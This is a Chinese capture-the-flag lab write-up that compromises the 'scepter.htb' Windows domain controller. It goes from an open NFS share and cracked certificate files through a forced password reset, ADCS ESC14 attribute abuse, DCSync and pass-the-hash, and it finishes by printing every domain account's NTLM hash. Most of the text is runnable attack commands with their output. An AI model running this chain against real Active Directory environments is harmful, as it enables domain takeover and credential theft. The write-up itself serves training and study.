基本信息
端口扫描 没有web,常规windows域端口,还有个2049 nfs:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 nmap -sC -sV -Pn 10.10.11.65 Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 18:00 JST Nmap scan report for 10.10.11.65 Host is up (0.10s latency). Not shown: 985 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-22 16:41:55Z) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time. | ssl-cert: Subject: commonName=dc01.scepter.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb | Not valid before: 2024-11-01T03:22:33 |_Not valid after: 2025-11-01T03:22:33 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.scepter.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb | Not valid before: 2024-11-01T03:22:33 |_Not valid after: 2025-11-01T03:22:33 |_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time. 2049/tcp open nlockmgr 1-4 (RPC #100021) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.scepter.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb | Not valid before: 2024-11-01T03:22:33 |_Not valid after: 2025-11-01T03:22:33 |_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time. | ssl-cert: Subject: commonName=dc01.scepter.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb | Not valid before: 2024-11-01T03:22:33 |_Not valid after: 2025-11-01T03:22:33 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=dc01.scepter.htb | Subject Alternative Name: DNS:dc01.scepter.htb | Not valid before: 2024-11-01T00:21:41 |_Not valid after: 2025-11-01T00:41:41 | tls-alpn: |_ http/1.1 |_http-title: Not Found |_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-04-22T16:42:44 |_ start_date: N/A |_clock-skew: mean: 7h40m17s, deviation: 0s, median: 7h40m16s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 154.21 seconds
nfs nfs未授权,可以看到一个helpdesk,里面是一些证书文件:
1 2 3 4 5 6 showmount -e 10.10.11.65 Export list for 10.10.11.65: /helpdesk (everyone) mkdir nfs sudo mount -t nfs 10.10.11.65:/helpdesk ./nfs
全都复制下来
pfx 应该是adcs相关,直接尝试使用需要密码,另外baker是crt和key文件,需要处理一下转换成pfx,需要的密码先从其他pfx文件破解,几个证书文件使用的相同密码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 faketime "$(curl -sik http://10.10.11.65:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash python3 pfx2john.py scott.pfx > scott.hash sudo john scott.hash --wordlist=/usr/share/wordlists/rockyou.txt newpassword openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt certipy-ad cert -export -pfx baker.pfx -password newpassword -out baker_unprotected.pfx certipy-ad auth -pfx baker_unprotected.pfx -dc-ip 10.10.11.65 -domain scepter.htb d.baker@scepter.htb 18b5fb0d99e7a475316213c15b6f22ce # 只有baker能获取到hash ,其他几个pfx都是revoked
bloodhound 得到有效认证信息后就是常规bloodhound:
1 bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' -ns 10.10.11.65 --zip -c All -dc 'dc01.scepter.htb'
很明显的下一步,d.baker可以强制更改a.carter的密码:
a.carter 强制更改a.carter的密码:
1 bloodyAD --host "10.10.11.65" -u 'd.baker' -p 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' set password "a.carter" "Password@987"
然后a.carter是 it support 组成员,对STAFF ACCESS CERTIFICATE有GenericAll:
然后STAFF ACCESS CERTIFICATE这个OU又只包含d.baker这一个已拥有的用户:
ESC14 to h.brown 根据已有信息,我们可以完全控制d.baker,包括修改他的各种属性,满足ESC 14条件:
1 2 3 4 # 上面看到的GenericAll可能是别人加的,自己加一下也可以 bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" --dc-ip "10.10.11.65" add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" "a.carter" bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "h.brown@scepter.htb"
然后就可以请求修改的mail属性的h. Brown证书:
1 2 3 4 5 6 7 8 impacket-getTGT scepter.htb/d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -dc-ip 10.10.11.65 export KRB5CCNAME="d.baker.ccache" certipy-ad req -k -username "h.brown" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out h.brown certipy-ad auth -pfx h.brown.pfx -dc-ip 10.10.11.65 -domain scepter.htb -username "h.brown" [*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
user flag kerberos认证登录winrm:
1 2 export KRB5CCNAME=h.brown.ccache evil-winrm -i dc01.scepter.htb -r scepter.htb
/etc/krb5.conf 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [libdefaults] default_realm = SCEPTER.HTB dns_lookup_kdc = false dns_lookup_realm = false [realms] SCEPTER.HTB = { kdc = dc01.scepter.htb admin_server = dc01.scepter.htb } [domain_realm] .scepter.htb = SCEPTER.HTB scepter.htb = SCEPTER.HTB
ADCS to p.adams h.brown是Certificate Management Service组成,所以同样的方式可以修改其他用户的证书相关属性,例如p.adams用户有dcsync权限,然后就和前面一样通过d.baker打ESC14:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 export KRB5CCNAME=h.brown.ccache # 使用h.brown身份修改p.adams altSecurityIdentities属性 bloodyAD -d "scepter.htb" -u "h.brown" -k --host "dc01.scepter.htb" --dc-ip "10.10.11.65" set object "p.adams" altSecurityIdentities -v "X509:<RFC822>p.adams@scepter.htb" # 修改d.baker mail bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "p.adams@scepter.htb" export KRB5CCNAME="d.baker.ccache" # 使用d.baker身份请求p.adams证书 certipy-ad req -k -username "p.adams" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out p.adams # p.adams证书认证 certipy-ad auth -pfx "padams.pfx" -domain "scepter.htb" -dc-ip "10.10.11.65" -username "p.adams" # dcsync impacket-secretsdump -just-dc-user administrator scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0 Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
root flag Administrator hash登录:
1 evil-winrm -i 10.10.11.65 -u Administrator -H a291ead3493f9773dc615e66c2ea21c4
hashdump 1 2 3 4 5 6 7 8 9 10 11 12 13 14 impacket-secretsdump scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0 -just-dc-ntlm Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9::: scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce::: scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200::: scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c::: scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0::: scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3::: scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04::: scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5::: DC01$ :1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f::: [*] Cleaning up...
参考资料
最終更新:2025-07-26 10:15:17
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会